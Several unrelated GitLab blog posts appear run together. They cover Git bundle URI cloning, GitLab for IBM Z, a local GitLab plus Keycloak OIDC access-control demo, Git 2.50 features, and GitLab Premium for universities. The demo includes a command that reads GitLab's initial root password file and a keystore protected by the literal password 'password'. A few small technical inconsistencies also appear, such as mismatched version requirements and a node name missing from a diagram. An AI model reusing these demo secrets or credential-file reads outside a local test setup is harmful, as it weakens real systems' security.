The current heuristic keeps track of the number of times a git fetch request is issued for each repository. If the number of requests reaches a certain threshold in a given time interval, a bundle is automatically generated. Gitaly also keeps track of the last time it generated a bundle for a repository. When a new bundle should be regenerated, based on the threshold and interval, Gitaly looks at the last time a bundle was generated for the given repository. It will only generate a new bundle if the existing bundle is older than some maxBundleAge configuration. The old bundle is overwritten. There can only be one bundle per repository in cloud storage.

Using bundle URI

When a bundle exists for a repository, it can be used by the git clone command.

Cloning from your terminal

To clone a repository from your terminal, make sure your Git configuration enables bundle URI. The configuration can be set like so:

git config --global transfer.bundleuri true

To verify that bundle URI is used during a clone, you can run the git clone command with GIT_TRACE=1 and see if your bundle is being downloaded:

➜  GIT_TRACE=1 git clone https://gitlab.com/gitlab-org/gitaly
...
14:31:42.374912 run-command.c:667       trace: run_command: git-remote-https '<bundle-uri>'
...

Cloning during CI/CD pipelines

One scenario where using bundle URI would be beneficial is during a CI/CD pipeline, where each job needs a copy of the repository in order to run. Cloning a repository during a CI/CD pipeline is the same as cloning a repository from your terminal, except that the Git client in this case is the GitLab Runner. Thus, we need to configure the GitLab Runner in such a way that it can use bundle URI.

1. Update the helper-image

The first thing to do to configure the GitLab Runner is to overwrite the helper-image that your GitLab Runner instances use. The helper-image is the image that is used to run the process of cloning a repository before the job starts. To use bundle URI, the image needs the following:

• Git Version 2.49.0 or later

• GitLab Runner helper Version 18.1.0 or later

The helper-images can be found here. Select an image that corresponds to the OS distribution and the architecture you use for your GitLab Runner instances, and verify that the image satisfies the requirements.

At the time of writing, the alpine-edge-<arch>-v18.1.0* tag meets all requirements.

You can validate the image meets all requirements with:

docker run -it <image:tag>
$ git version ## must be 2.49.0 or newer
$ gitlab-runner-helper -v ## must be 18.0 or newer

If you do not find an image that meets the requirements, you can also use the helper-image as a base image and install the requirements yourself in a custom-built image that you can host on GitLab Container Registry.

Once you have found the image you need, you must configure your GitLab Runner instances to use it by updating your config.toml file:

[[runners]]
 (...)
 executor = "docker"
 [runners.docker]
    (...)
    helper_image = "image:tag" ## <-- put the image name and tag here

Once the configuration is changed, you must restart the runners for the new configuration to take effect.

2. Turn on the feature flag

Next, you must enable the FF_USE_GIT_NATIVE_CLONE GitLab Runner feature flags in your .gitlab-ci.yml file. To do that, simply add it as a variable and set to true :

variables:
  FF_USE_GIT_NATIVE_CLONE: "true"

The GIT_STRATEGY must also be set to clone, as Git bundle URI only works with clone commands.

How bundle URI works

When a user clones a repository with the git clone command, a process called git-receive-pack is launched on the client's machine. This process communicates with the remote repository's server (it can be over HTTP/S, SSH, etc.) and asks to start a git-upload-pack process. Those two processes then exchange information using the Git protocol (it must be noted that bundle URI is only supported with Git protocol v2). The capabilities both processes support and the references and objects the client needs are among the information exchanged. Once the Git server has determined which objects to send to the client, it must package them into a packfile, which, depending on the size of the data it must process, can consume a good amount of resources.

Where does bundle URI fit into this interaction? If bundle URI is advertised as a capability from the upload-pack process and the client supports bundle URI, the Git client will ask the server if it knows about any bundle URIs. The server sends those URIs back and the client downloads those bundles.

Here is a diagram that shows those interactions:

sequenceDiagram


    participant receive as Client


    participant upload as Server


    participant cloud as File server


    receive ->> upload: issue git-upload-pack


    upload -->> receive: list of server capabilities


    opt if bundle URI is advertised as a capability


    receive ->> upload: request bundle URI


    upload -->> receive: bundle URI


    receive ->> cloud: download bundle at URI


    cloud -->> receive: bundle file


    receive ->> receive: clone from bundle


    end


    receive ->> upload: requests missing references and objects


    upload -->> receive: packfile data

As such, Git bundle URI is a mechanism by which, during a git clone, a Git server can advertise the URI of a bundle for the repository being cloned by the Git client. When that is the case, the Git client can clone the repository from the bundle and request from the Git server only the missing references or objects that were not part of the bundle. This mechanism really helps to alleviate pressure from the Git server.

Alternatives

GitLab also has a feature Pack-objects cache. This feature works slightly differently than bundle URI. When the server packs objects together into a so-called packfile, this feature will keep that file in the cache. When another client needs the same set of objects, it doesn't need to repack them, but it can just send the same packfile again.

The feature is only beneficial when many clients request the exact same set of objects. In a repository that is quick-changing, this feature might not give any improvements. With bundle URI, it doesn't matter if the bundle is slightly out-of-date because the client can request missing objects after downloading the bundle and apply those changes on top. Also bundle URI in Gitaly stores the bundles on external storage, which the Pack-objects Cache stores them on the Gitaly node, so using the latter doesn't reduce network and I/O load on the Gitaly server.

Try bundle URI today

You can try the bundle URI feature in one of the following ways:

• Download a free, 60-day trial version of GitLab Ultimate.

• If you already run a self-hosted GitLab installation, upgrade to 18.1.

• If you can't upgrade to 18.1 at this time, download GitLab to a local machine.

Challenges of today's mainframe development

Enterprise organizations that use IBM Z systems for mission-critical workloads face challenges that conventional DevSecOps tools aren’t equipped to address. Cloud-native teams benefit from modern CI/CD pipelines, collaborative development, and automated testing. In contrast, mainframe teams are often left behind — stuck with outdated tools that lead to costly inefficiencies and operational silos.

Teams often resort to workarounds, such as SSH connections and manual file transfers, which create security vulnerabilities and audit difficulties. When compliance requirements are stringent, these improvised solutions become unacceptable risks. Meanwhile, organizations maintain expensive parallel toolchains, with legacy mainframe development tools carrying premium licensing costs while delivering limited functionality compared to modern alternatives.

This fragmentation creates two problems: slower delivery cycles and difficulty attracting developers who expect modern development experiences.

"GitLab Ultimate for IBM Z represents an important step in addressing a long-standing industry challenge. IDC research shows that mainframe developers often work with legacy tooling that contributes to delivery inefficiencies and makes it harder to attract new talent. With this offering, modern DevSecOps capabilities and unified workflows are brought directly to the mainframe. This empowers developers to work more collaboratively and efficiently, while helping organizations accelerate innovation and integrate mainframe development into broader digital transformation strategies." - Katie Norton, Research Manager, DevSecOps and Software Supply Chain Security at IDC

Unified development environments

True modernization means more than just updating mainframe development. It means creating a unified platform where mainframe, cloud-native, web, and mobile development teams collaborate seamlessly.

GitLab Ultimate for IBM Z enables developers to use consistent workflows whether they're deploying to z/OS, cloud, or on-premises infrastructure — knowledge transfers between teams instead of staying siloed. Organizations can modernize incrementally without business disruption, as legacy systems continue operating while teams adopt modern practices at their own pace.

As organizations pursue hybrid cloud strategies, GitLab provides the foundation for applications that span mainframe and cloud-native environments.

What is GitLab Ultimate for IBM Z?

GitLab Ultimate for IBM Z delivers native z/OS Runner support, enabling seamless CI/CD pipeline execution directly on your mainframe infrastructure. This GitLab-certified solution helps eliminate the need for complex workarounds while maintaining the security and reliability your enterprise applications demand.

The combination of GitLab's comprehensive DevSecOps platform with IBM's deep mainframe expertise creates something unique in the market: a certified solution that provides a true bridge between enterprise legacy systems and cloud-native innovation.

GitLab Ultimate for IBM Z capabilities

GitLab Ultimate for IBM Z provides enterprise teams with the tools they need to modernize mainframe development while preserving critical business systems.

Native z/OS Runner support helps eliminate security risks and scalability bottlenecks associated with remote connections, while accelerating delivery through CI/CD pipelines that execute directly where your mainframe code resides.

Unified Source Code Management modernizes your toolchain by replacing expensive legacy library managers with GitLab's searchable, version-controlled repository system, helping reduce licensing costs and maintenance overhead.

Seamless integration with IBM Developer for z/OS Enterprise Edition (IDzEE) delivers faster software releases through dependency-based builds, automated code scanning, and comprehensive debugging tools within familiar developer environments, enhancing both quality and security.

End-to-end visibility across mainframe and distributed environments provides comprehensive project management from planning to production, enabling automated DevOps workflows that help retain talent through modern, next-generation development tools.

Modernize your mainframe development environment today

GitLab Ultimate for IBM Z is available now for organizations ready to transform their mainframe development experience. To learn more, visit the GitLab and IBM partnership page.

To help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.

This foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.

GitLab customer Lely, a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced least-privilege policies, and created a scalable, reusable access model to support their future development initiatives.

In this guide, we’ll take you through a hands-on implementation example of GitLab + Keycloak + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.

This is a local demo setup intended for proof-of-concept purposes only.

Whether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.

Getting started with access control planning

Before implementing any tooling, it’s essential to understand your access landscape.

Consider:

• What GitLab resources need protection (projects, groups, environments)?
• Who are your personas (Developers, Maintainers, Guests, etc.)?
• What organizational units (departments, cost centers) should govern access?
• How does your IdP structure (Keycloak) define users and roles?

Use this stage to draft your:

• Access control matrix
• GitLab group hierarchy (team- or product-based)
• Least privilege policy assumptions

Sample group hierarchy

graph TD
    Root["Root (Root Group)"]
    FirmwareTeam["Firmware-Team"]
    FirmwareDevelopers["Developers (GitLab Developer Role)"]
    FirmwareMaintainers["Maintainers (GitLab Maintainer Role)"]
    FirmwareReporters["Reporters (GitLab Reporter Role)"]
    HardwareTeam["Hardware-Team"]
    HardwareDevelopers["Developers"]
    SoftwareTeam["Software-Team"]
    SoftwareDevelopers["Developers"]
    SoftwareMaintainers["Maintainers"]
    SoftwareReporters["Reporters"]
    
    Enterprise --> FirmwareTeam
    Enterprise --> HardwareTeam
    Enterprise --> SoftwareTeam
    
    FirmwareTeam --> FirmwareDevelopers
    FirmwareTeam --> FirmwareMaintainers
    FirmwareTeam --> FirmwareReporters
    
    HardwareTeam --> HardwareDevelopers
    
    SoftwareTeam --> SoftwareDevelopers
    SoftwareTeam --> SoftwareMaintainers
    SoftwareTeam --> SoftwareReporters

Demo system setup: GitLab + Keycloak in a local Docker environment

Prerequisites

• Docker, Docker Compose, OpenSSL
• GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images
• Self-signed certificates

.env configuration

The demo setup is using the following GitLab and Keycloak versions, ports and secrets.

GitLab configuration

GITLAB_VERSION=17.7.3-ee.0
GITLAB_EXTERNAL_URL=http://localhost:8081
GITLAB_SSH_PORT=8222

Keycloak configuration

KEYCLOAK_VERSION=latest
KEYCLOAK_ADMIN=<your-admin-username>
KEYCLOAK_ADMIN_PASSWORD=<your-admin-password>
KEYCLOAK_HTTPS_PORT=8443
KEYCLOAK_CLIENT_SECRET=<your-client-secret>  # Get this from Keycloak after setup

Generate SSL certificates

To establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.

For production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.

Follow these step-by-step instructions:

1. Create a folder for the certificates.

mkdir -p certs

2. Generate a self-signed certificate with OpenSSL.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
  -keyout certs/tls.key \
  -out certs/tls.crt \
  -subj "/CN=keycloak" \
  -addext "subjectAltName=DNS:keycloak,DNS:localhost"

3. Create a PKCS12 keystore for Keycloak.

openssl pkcs12 -export \
  -in certs/tls.crt \
  -inkey certs/tls.key \
  -out certs/keystore.p12 \
  -name keycloak \
  -password pass:password

Start the service using Docker compose

Now that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:

version: '3.8'
services:
  gitlab:
    image: gitlab/gitlab-ee:${GITLAB_VERSION}
    container_name: gitlab
    restart: unless-stopped
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'
        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}
        gitlab_rails['display_initial_root_password'] = true

        # OAuth Configuration
        gitlab_rails['omniauth_enabled'] = true
        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']
        gitlab_rails['omniauth_block_auto_created_users'] = false
        gitlab_rails['omniauth_providers'] = [
            {
                'name' => 'openid_connect',
                'label' => 'Keycloak',
                'args' => {
                    'name' => 'openid_connect',
                    'scope' => ['openid', 'profile', 'email'],
                    'response_type' => 'code',
                    'issuer' => 'https://localhost:8443/realms/GitLab',
                    'client_auth_method' => 'query',
                    'discovery' => false,
                    'uid_field' => 'preferred_username',
                    'pkce' => true,
                    'client_options' => {
                        'identifier' => 'gitlab',
                        'secret' => '${KEYCLOAK_CLIENT_SECRET}',
                        'redirect_uri' => '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',
                        'authorization_endpoint' => 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',
                        'token_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',
                        'userinfo_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',
                        'jwks_uri' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'
                    }
                }
            }
        ]
    volumes:
      - gl-config:/etc/gitlab
      - gl-data:/var/opt/gitlab
      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt
    ports:
      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'
      - '${GITLAB_SSH_PORT:-8222}:22'
    shm_size: '256m'

  keycloak:
    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}
    container_name: keycloak-server
    restart: unless-stopped
    command: [
      "start-dev",
      "--import-realm",
      "--https-port=${KEYCLOAK_HTTPS_PORT}",
      "--https-key-store-file=/etc/x509/https/keystore.p12",
      "--https-key-store-password=password"
    ]
    volumes:
      - ./data:/opt/keycloak/data/import
      - ./certs:/etc/x509/https
    environment:
      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}
      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}
    ports:
      - "${KEYCLOAK_HTTPS_PORT}:8443"

volumes:
  gl-config:
  gl-data:

Run the docker-compose up -d command and your GitLab + Keycloak environment will be up in minutes.

docker-compose up -d

Keycloak realm configuration

Your Keycloak realm is automatically configured on startup as it's defined in the docker-compose file.

The realm configuration will include:

• Pre-configured GitLab client
• Default client secret

You can access Keycloak admin console at https://localhost:8443 with:

• Username: admin
• Password: from your .env file
• To verify the setup:
  • Log into Keycloak admin console
  • Select the GitLab realm
  • Check Clients > gitlab

Verify the client configuration matches your environment.

To showcase the automated RBAC mechanism, you will need to follow these steps:

• Map realm roles to GitLab roles
• Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.

Before provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:

1. Access GitLab at http://localhost:8081.

2. Get the root password:

docker exec gitlab grep 'Password:' `/etc/gitlab/initial_root_password`

3. Log in as root with the retrieved password.

Putting it all together

To demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access.

Begin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects.

Upon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention.

Within GitLab, you can see that the user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model.

Finally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.

Why GitLab?

GitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams.

Integrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.

Summary

RBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.

Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. Sign up today!

New git-diff-pairs(1) command

Diffs are at the heart of every code review and show all the changes made between two revisions. GitLab shows diffs in various places, but the most common place is a merge request's "Changes" tab. Behind the scenes, diff generation is powered by git-diff(1). For example:

$ git diff HEAD~1 HEAD

This command returns the full diff for all changed files. This might pose a scalability challenge because the number of files changed between a set of revisions could be very large and cause the command to reach self-imposed timeouts for the GitLab backend. For large change sets, it would be better if there were a way to break diff computation into smaller, more digestible chunks.

One way this can be achieved is by using git-diff-tree(1) to retrieve info about all the changed files:

$ git diff-tree -r -M --abbrev HEAD~ HEAD
:100644 100644 c9adfed339 99acf81487 M      Documentation/RelNotes/2.50.0.adoc
:100755 100755 1047b8d11d 208e91a17f M      GIT-VERSION-GEN

Git refers to this output as the "raw" format. In short, each line of output lists filepairs and the accompanying metadata about what has changed between the start and end revisions. Compared to generating the "patch" output for large changes, this process is relatively quick and provides a summary of everything that changed. This command can optionally perform rename detection by appending the -M flag to check if identified changes were due to a file rename.

With this information, we could use git-diff(1) to compute each of the filepair diffs individually. For example, we can provide the blob IDs directly:

$ git diff 1047b8d11de767d290170979a9a20de1f5692e26 208e91a17f04558ca66bc19d73457ca64d5385f

We can repeat this process for each of the filepairs, but spinning up a separate Git process for each individual file diff is not very efficient. Furthermore, when using blob IDs, the diff loses some contextual information such as the change status, and file modes which are stored in with the parent tree object. What we really want is a mechanism to feed "raw" filepair info and generate the corresponding patch output.

With the 2.50 release, Git has a new built-in command named git-diff-pairs(1). This command accepts "raw" formatted filepair info as input on stdin to determine exactly which patches to output. The following example showcases how this command could be used:

$ git diff-tree -r -z -M HEAD~ HEAD | git diff-pairs -z

When used in this manner, the resulting output is identical to using git-diff(1). By having a separate command to generate patch output, the "raw" output from git-diff-tree(1) can be broken up into smaller batches of filepairs and fed to separate git-diff-pairs(1) processes. This solves the previously mentioned scalability concern because diffs no longer have to be computed all at once. Future GitLab releases could build upon this mechanism to improve diff generation performance, especially in cases where large change sets are concerned. For more information on this change, check out the corresponding mailing-list thread.

This project was led by Justin Tobler.

Batched reference updates

Git provides the git-update-ref(1) command to perform reference updates. When used with the --stdin flag, multiple reference updates can be batched together in a single transaction by specifying instructions for each reference update to be performed on stdin. Bulk updating references in this manner also provides atomic behavior whereby a single reference update failure results in an aborted transaction and no references being updated. Here is an example showcasing this behavior:

# Create repository with three empty commits and branch named "foo"
$ git init
$ git commit --allow-empty -m 1
$ git commit --allow-empty -m 2
$ git commit --allow-empty -m 3
$ git branch foo

# Print out the commit IDs
$ git rev-list HEAD
cf469bdf5436ea1ded57670b5f5a0797f72f1afc
5a74cd330f04b96ce0666af89682d4d7580c354c
5a6b339a8ebffde8c0590553045403dbda831518

# Attempt to create a new reference and update existing reference in transaction.
# Update is expected to fail because the specified old object ID doesn’t match.
$ git update-ref --stdin <<EOF
> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
> EOF
fatal: cannot lock ref 'refs/heads/foo': is at cf469bdf5436ea1ded57670b5f5a0797f72f1afc but expected 5a74cd330f04b96ce0666af89682d4d7580c354c

# The "bar" reference was not created.
$ git switch bar
fatal: invalid reference: bar

Compared to updating many references individually, updating in bulk is also much more efficient. While this works well, there might be certain circumstances where it is okay for a subset of the requested reference updates to fail, but we still want to take advantage of the efficiency gains of bulk updates.

With this release, git-update-ref(1) has the new --batch-updates option, which allows the updates to proceed even when one or more reference updates fails. In this mode, individual failures are reported in the following format:

rejected SP (<old-oid> | <old-target>) SP (<new-oid> | <new-target>) SP <rejection-reason> LF

This allows successful reference updates to proceed while providing context to which updates were rejected and for what reason. Using the same example repository from the previous example:

# Attempt to create a new reference and update existing reference in transaction.
$ git update-ref --stdin --batch-updates <<EOF
> create refs/heads/bar cf469bdf5436ea1ded57670b5f5a0797f72f1afc
> update refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c
> EOF
rejected refs/heads/foo 5a6b339a8ebffde8c0590553045403dbda831518 5a74cd330f04b96ce0666af89682d4d7580c354c incorrect old value provided

# The "bar" reference was created even though the update to "foo" was rejected.
$ git switch bar
Switched to branch 'bar'

This time, with the --batch-updates option, the reference creation succeeded even though the update didn't work. This patch series lays the groundwork for future performance improvements in git-fetch(1) and git-receive-pack(1) when references are updated in bulk. For more information, check the mailing-list thread

This project was led by Karthik Nayak.

New filter option for git-cat-file(1)

With git-cat-file(1), it is possible to print info for all objects contained in the repository via the --batch–all-objects option. For example:

# Setup simple repository.
$ git init
$ echo foo >foo
$ git add foo
$ git commit -m init

# Create an unreachable object.
$ git commit --amend --no-edit

# Use git-cat-file(1) to print info about all objects including unreachable objects.
$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
tree 205f6b799e7d5c2524468ca006a0131aa57ecce7
blob 257cc5642cb1a054f08cc83f2d943e56fd3ebe99
commit c999f781fd7214b3caab82f560ffd079ddad0115

In some situations, a user might want to search through all objects in the repository, but only output a subset based on some specified attribute. For example, if we wanted to see only the objects that are commits, we could use grep(1):

$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' | grep ^commit
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115

While this works, one downside with filtering the output is that git-cat-file(1) still has to traverse all the objects in the repository, even the ones that the user is not interested in. This can be rather inefficient.

With this release, git-cat-file(1) now has the --filter option, which only shows objects matching the specified criteria. This is similar to the option of the same name for git-rev-list(1), but with only a subset of the filters supported. The supported filters are blob:none, blob:limit=, as well as object:type=. Similar to the previous example, objects can be filtered by type with Git directly:

$ git cat-file --batch-all-objects --batch-check='%(objecttype) %(objectname)' --filter='object:type=commit'
commit 0b07e71d14897f218f23d9a6e39605b466454ece
commit c999f781fd7214b3caab82f560ffd079ddad0115

Not only is it convenient for Git to handle the processing, for large repositories with many objects, it is also potentially more efficient. If a repository has bitmap indices, it becomes possible for Git to efficiently lookup objects of a specific type, and thus avoid scanning through the packfile, which leads to a significant speedup. Benchmarks conducted on the Chromium repository show significant improvements:

Benchmark 1: git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter
   Time (mean ± σ):     82.806 s ±  6.363 s    [User: 30.956 s, System: 8.264 s]
   Range (min … max):   73.936 s … 89.690 s    10 runs

Benchmark 2: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
   Time (mean ± σ):      20.8 ms ±   1.3 ms    [User: 6.1 ms, System: 14.5 ms]
   Range (min … max):    18.2 ms …  23.6 ms    127 runs

Benchmark 3: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   Time (mean ± σ):      1.551 s ±  0.008 s    [User: 1.401 s, System: 0.147 s]
   Range (min … max):    1.541 s …  1.566 s    10 runs

Benchmark 4: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   Time (mean ± σ):     11.169 s ±  0.046 s    [User: 10.076 s, System: 1.063 s]
   Range (min … max):   11.114 s … 11.245 s    10 runs

Benchmark 5: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
   Time (mean ± σ):     67.342 s ±  3.368 s    [User: 20.318 s, System: 7.787 s]
   Range (min … max):   62.836 s … 73.618 s    10 runs

Benchmark 6: git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
   Time (mean ± σ):     13.032 s ±  0.072 s    [User: 11.638 s, System: 1.368 s]
   Range (min … max):   12.960 s … 13.199 s    10 runs

Summary
   git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tag
    74.75 ± 4.61 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=commit
   538.17 ± 33.17 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=tree
   627.98 ± 38.77 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=blob:none
  3244.93 ± 257.23 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --filter=object:type=blob
  3990.07 ± 392.72 times faster than git cat-file --batch-check --batch-all-objects --unordered --buffer --no-filter

Interestingly, these results indicate that the computation time now scales with the number of objects for a given type instead of the number of total objects in the packfile. The original mailing-list thread can be found here.

This project was led by Patrick Steinhardt.

Improved performance when generating bundles

Git provides a means to generate an archive of a repository which contains a specified set of references and accompanying reachable objects via the git-bundle(1) command. This operation is used by GitLab to generate repository backups and also as part of the bundle-URI mechanism.

For large repositories containing millions of references, this operation can take hours or even days. For example, with the main GitLab repository (gitlab-org/gitlab), backup times were around 48 hours. Investigation revealed there was a performance bottleneck due to how Git was performing a check to avoid duplicated references being included in the bundle. The implementation used a nested for loop to iterate and compare all listed references, leading to O(N^2) time complexity. This scales very poorly as the number of references in a repository increases.

In this release, this issue was addressed by replacing the nested loops with a map data structure leading to a significant speedup. The following benchmark the performance improvement for creating a bundle with a repository containing 100,000 references:

Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ):     14.653 s ±  0.203 s    [User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s    10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):      2.394 s ±  0.023 s    [User: 1.684 s, System: 0.798 s]
  Range (min … max):    2.364 s …  2.425 s    10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
    6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)

To learn more, check out our blog post How we decreased GitLab repo backup times from 48 hours to 41 minutes. You can also find the original mailing list thread here.

This project was led by Karthik Nayak.

Better bundle URI unbundling

Through the bundle URI mechanism in Git, locations to fetch bundles from can be provided to clients with the goal to help speed up clones and fetches. When a client downloads a bundle, references under refs/heads/* are copied from the bundle into the repository along with their accompanying objects. A bundle might contain additional references outside of refs/heads/* such as refs/tags/*, which are simply ignored when using bundle URI on clone.

In Git 2.50, this restriction is lifted, and all references matching refs/* contained in the downloaded bundle are copied. Scott Chacon, who contributed this functionality, demonstrates the difference when cloning gitlab-org/gitlab-foss:

$ git-v2.49 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.49
Cloning into 'gl2.49'...
remote: Enumerating objects: 1092703, done.
remote: Counting objects: 100% (973405/973405), done.
remote: Compressing objects: 100% (385827/385827), done.
remote: Total 959773 (delta 710976), reused 766809 (delta 554276), pack-reused 0 (from 0)
Receiving objects: 100% (959773/959773), 366.94 MiB | 20.87 MiB/s, done.
Resolving deltas: 100% (710976/710976), completed with 9081 local objects.
Checking objects: 100% (4194304/4194304), done.
Checking connectivity: 959668, done.
Updating files: 100% (59972/59972), done.

$ git-v2.50 clone --bundle-uri=gitlab-base.bundle https://gitlab.com/gitlab-org/gitlab-foss.git gl-2.50
Cloning into 'gl-2.50'...
remote: Enumerating objects: 65538, done.
remote: Counting objects: 100% (56054/56054), done.
remote: Compressing objects: 100% (28950/28950), done.
remote: Total 43877 (delta 27401), reused 25170 (delta 13546), pack-reused 0 (from 0)
Receiving objects: 100% (43877/43877), 40.42 MiB | 22.27 MiB/s, done.
Resolving deltas: 100% (27401/27401), completed with 8564 local objects.
Updating files: 100% (59972/59972), done.

Comparing these results, we see that Git 2.50 fetches 43,887 objects (40.42 MiB) after the bundle was extracted whereas Git 2.49 fetches a total of 959,773 objects (366.94 MiB). Git 2.50 fetches roughly 95% fewer objects and 90% less data, which benefits both the client and the server. The server needs to process a lot less data to the client and the client needs to download and extract less data. In the example provided by Scott this led to a speedup of 25%.

To learn more, check out the corresponding mailing-list thread.

This patch series was contributed by Scott Chacon.

Read more

This article highlighted just a few of the contributions made by GitLab and the wider Git community for this latest release. You can learn about these from the official release announcement of the Git project. Also, check out our previous Git release blog posts to see other past highlights of contributions from GitLab team members.

GitLab's comprehensive, intelligent DevSecOps platform delivers value that extends far beyond fundamental version control. Built on an open source foundation with enterprise-grade features, GitLab Premium helps prevent costly security incidents involving student data, provides cloud-based development environments for distributed teams, and offers the professional support that educational institutions need for mission-critical systems. And now Premium includes GitLab Duo AI essentials Code Suggestions and Chat at no additional cost.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1083723619?badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Premium with Duo Core"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

The unique development environment in higher education

Universities and colleges operate in a distinctly challenging technical environment. Development teams must support multidisciplinary collaboration across technical and non-technical departments while managing vast amounts of sensitive data – from student records and financial information to research findings and faculty evaluations.

Most institutions face these challenges with limited IT resources, yet must support thousands of concurrent users across numerous projects and research initiatives. Research integrity requirements add another layer of complexity, as development work often needs to maintain traceability and reproducibility standards.

Premium solutions for educational institutions

GitLab Premium with Duo has the functionality that higher education needs.

Enhanced collaboration and workflow capabilities

Cross-departmental projects are common in educational settings – from multi-department research initiatives to custom module development for systems like Ellucian Banner, an enterprise resource planning application used by higher education. These complex projects require sophisticated workflow management that goes beyond basic version control.

GitLab Premium addresses these challenges with powerful collaboration and project visualization features, including epics, roadmaps, and advanced Kanban boards for Agile development workflows. When you assign multiple approvers to certain merge requests and protected branches, you ensure higher code quality and accountability across teams. These tools allow institutions to coordinate work across departments while aligning with institution-wide objectives – essential for managing multiphase campus technology initiatives.

